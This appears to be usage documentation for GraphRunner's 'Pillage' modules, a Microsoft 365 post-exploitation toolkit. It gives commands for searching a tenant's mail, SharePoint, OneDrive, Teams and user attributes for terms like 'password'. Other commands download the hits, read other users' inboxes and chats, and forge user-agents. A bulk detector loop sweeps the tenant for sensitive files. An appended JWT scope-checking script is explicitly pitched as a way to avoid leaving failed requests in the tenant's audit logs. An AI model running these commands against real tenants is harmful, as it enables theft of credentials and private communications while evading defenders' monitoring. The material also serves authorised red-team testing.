Pillage Modules
Invoke-SearchMailbox
This module uses the Graph search API to search for specific terms in emails and lets the user download the matching messages, including attachments.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
SearchTerm - The term you want to search for in the mailbox
MessageCount - The number of messages returned in the search results (default = 25)
OutFile - File to output a list of emails to
DetectorName - Custom label used when exporting results for detector-based workflows
GraphRun - Internal switch used by Invoke-GraphRunner to suppress interactive output
PageResults - Page through all results for the search term instead of stopping at the first page
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40

Invoke-SearchSharePointAndOneDrive
This module uses the Graph search API to search for specific terms in all SharePoint and OneDrive drives available to the logged-in user. It prompts the user to choose which of the matching files to download.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
SearchTerm - The term you want to search for. This accepts KQL queries so you can use terms like "filetype", "content", and more.
ResultCount - The number of files returned in the search results (default = 25)
DetectorName - Custom label used when exporting results for detector-based workflows
OutFile - File to output a list of hits to
ReportOnly - Skip the interactive download prompt and only report findings
PageResults - Page through all results for the search term instead of returning only the first ResultCount hits
GraphRun - Internal switch used by Invoke-GraphRunner to suppress interactive output
Device - Forge the user-agent as a specific device type
Browser - Forge the user-agent as a specific browser type
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password AND filetype:xlsx'

You can use this short script to loop through the default_detectors.json file and run every detector query in turn (Snaffler-like functionality):
$folderName = "SharePointSearch-" + (Get-Date -Format 'yyyyMMddHHmmss')
New-Item -Path $folderName -ItemType Directory | Out-Null
$spout = "$folderName\interesting-files.csv"
# Read the whole file as a single string (-Raw) so the multi-line JSON parses cleanly
$DetectorFile = ".\default_detectors.json"
$detector = Get-Content $DetectorFile -Raw | ConvertFrom-Json
# Each detector carries a DetectorName label and a KQL SearchQuery. Report only (no download prompts),
# page through all hits, and append every detector's results to the same CSV.
foreach($detect in $detector.Detectors){Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm $detect.SearchQuery -DetectorName $detect.DetectorName -PageResults -ResultCount 500 -ReportOnly -OutFile $spout -GraphRun}

Invoke-DriveFileDownload
This module downloads individual files from SharePoint or OneDrive using the DriveID:ItemID values returned by Invoke-SearchSharePointAndOneDrive.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
DriveItemIDs - Combined value of the drive ID and item ID separated by a colon
FileName - The filename you want to save the file as
Device - Forge the user-agent as a specific device type
Browser - Forge the user-agent as a specific browser type
Invoke-DriveFileDownload -Tokens $tokens -FileName "Passwords.docx" -DriveItemIDs "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"

Invoke-ImmersiveFileReader
Simple module to read a file with the immersive reader.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
SharePointDomain - The target SharePoint domain. e.g. targetcompany.sharepoint.com
DriveID - The drive ID
FileID - The ID of the file to open
Device - Forge the user-agent as a specific device type
Browser - Forge the user-agent as a specific browser type
Invoke-ImmersiveFileReader -Tokens $tokens -SharePointDomain targetcompany.sharepoint.com -DriveID <drive ID> -FileID <FileID>

Invoke-SearchTeams
This module uses the Substrate search API to search for specific terms in Teams channels visible to the logged-in user.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
SearchTerm - The term you want to search for in Teams messages
ResultSize - The number of messages returned in the search results (default = 50)
DetectorName - Custom label used when exporting results for detector-based workflows
OutFile - File to output the results of the search to
GraphRun - Internal switch used by Invoke-GraphRunner to suppress interactive output
Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100

Invoke-SearchUserAttributes
This module queries user attributes from the directory and searches them for a specific term.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
SearchTerm - The term you want to search across user attributes
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Get-Inbox
This module pulls the latest emails from the inbox of a particular user. NOTE: This is the module to use when reading mail from a shared mailbox.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
userid - Email address of the mailbox you want to read
TotalMessages - Default is 25, Max is 1000
OutFile - File to output the results to
Get-Inbox -Tokens $tokens -userid deckard@tyrellcorporation.io -TotalMessages 50 -OutFile emails.csv

Get-TeamsChat
This module downloads full Teams chat conversations. It prompts you to either download all conversations for a particular user or download individual conversations by chat ID. This module requires a token scoped to Chat.ReadBasic, Chat.Read, or Chat.ReadWrite.
--OPTIONS--
Tokens - Pass the $tokens global variable after authenticating to this parameter
Get-TeamsChat -Tokens $tokens 
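Because Get-TeamsChat only works with a token carrying one of the chat scopes listed above, it is worth checking the token locally before calling it rather than finding out from a 403 that also lands in the tenant's audit logs. The following is an added example and is not part of GraphRunner: it decodes the payload of the Graph access token (a JWT) and reports which of the required scopes it carries. It assumes that $tokens.access_token holds the raw JWT returned by the authentication modules; the sample token at the bottom is constructed inline and unsigned so the block runs offline.

```powershell
function ConvertTo-Base64Url {
    # Standard base64 -> base64url (URL-safe alphabet, padding stripped), used only to build the sample token
    param([Parameter(Mandatory)][string]$Text)
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Text)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function Get-JwtPayload {
    # Decode the middle (claims) segment of a compact JWT. No signature validation: this is a
    # local pre-flight on the claims, not proof that the token is genuine.
    param([Parameter(Mandatory)][string]$Jwt)
    $parts = $Jwt.Split('.')
    if ($parts.Count -ne 3) { throw "Value is not a compact JWT (header.payload.signature)" }
    # base64url -> standard base64: restore the URL-safe characters and the stripped padding
    $b64 = $parts[1].Replace('-', '+').Replace('_', '/')
    switch ($b64.Length % 4) {
        2 { $b64 += '==' }
        3 { $b64 += '=' }
    }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)) | ConvertFrom-Json
}

function Test-TokenScope {
    # Report whether the token grants at least one of the scopes in $RequiredAny
    param(
        [Parameter(Mandatory)][string]$Jwt,
        [Parameter(Mandatory)][string[]]$RequiredAny
    )
    $payload = Get-JwtPayload -Jwt $Jwt
    # Delegated tokens list space-separated scopes in "scp"; app-only tokens list app roles in "roles"
    $granted = @()
    if ($payload.scp)   { $granted += ($payload.scp -split ' ') }
    if ($payload.roles) { $granted += $payload.roles }
    $matched = @($granted | Where-Object { $RequiredAny -contains $_ })
    [pscustomobject]@{
        Audience  = $payload.aud
        ExpiresAt = [DateTimeOffset]::FromUnixTimeSeconds([long]$payload.exp).UtcDateTime
        Granted   = $granted
        Matched   = $matched
        Satisfied = ($matched.Count -gt 0)
    }
}

# Constructed, unsigned sample token for an offline dry run ("sig" is a placeholder, not a real signature)
$sampleClaims = @{ aud = 'https://graph.microsoft.com'; scp = 'Chat.Read User.Read'; exp = 4102444800 } | ConvertTo-Json -Compress
$sampleJwt = '{0}.{1}.{2}' -f (ConvertTo-Base64Url '{"alg":"none","typ":"JWT"}'), (ConvertTo-Base64Url $sampleClaims), 'sig'
Test-TokenScope -Jwt $sampleJwt -RequiredAny 'Chat.ReadBasic', 'Chat.Read', 'Chat.ReadWrite'

# Live usage after authenticating with GraphRunner (assumes $tokens.access_token holds the raw Graph JWT):
# $check = Test-TokenScope -Jwt $tokens.access_token -RequiredAny 'Chat.ReadBasic', 'Chat.Read', 'Chat.ReadWrite'
# if ($check.Satisfied) { Get-TeamsChat -Tokens $tokens }
# else { Write-Warning "Token lacks a chat scope; granted: $($check.Granted -join ' ')" }
```

For the sample token the result shows Chat.Read as the single match and Satisfied set to true. On a live token, also confirm that Audience is the Graph resource (https://graph.microsoft.com or its application ID) and that ExpiresAt is in the future; a token minted for another resource will carry a different scp list and will not work against the Graph chat endpoints regardless of what it contains.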